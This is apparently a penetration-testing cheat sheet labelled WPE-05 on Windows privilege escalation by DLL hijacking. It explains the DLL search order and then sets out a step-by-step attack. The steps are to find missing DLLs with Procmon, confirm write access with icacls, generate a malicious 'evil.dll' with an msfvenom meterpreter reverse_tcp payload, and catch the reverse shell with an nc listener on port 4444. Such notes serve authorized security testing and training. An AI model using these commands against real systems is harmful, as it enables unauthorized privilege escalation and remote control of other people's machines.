WPE-05 - DLL Hijacking In Windows environments when an application or a service is starting it looks for a number of DLL’s in order to function properly. If these DLL’s doesn’t exist or are implemented in an insecure way (DLL’s are called without using a fully qualified path) then it is possible to escalate privileges by forcing the application to load and execute a malicious DLL file.
It should be noted that when an application needs to load a DLL it will go through the following order:
- The directory from which the application is loaded
- C:\Windows\System32
- C:\Windows\System
- C:\Windows
- The current working directory
- Directories in the system PATH environment variable
- Directories in the user PATH environment variable
1 find process with missing dll
use procmon from sysinternals to check for missing dlls (“NAME NOT FOUND”)
1.1 filters
Process Name is <[Value]> Result is <[NAME NOT FOUND]> Path ends with .dll*
2 confirm that you have write permissions to any of the folders
c:/path/to_inject/dll>: icacls .
importantn values:
a sequence of simple rights:
N — no access
F — full access
M — modify access
RX — read and execute access
R — read-only access
W — write-only access
D — delete access
3 create dll
3.1 reverse shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -f dll -o evil.dll
3.2 create user
4 start listener
nc -nlvp 4444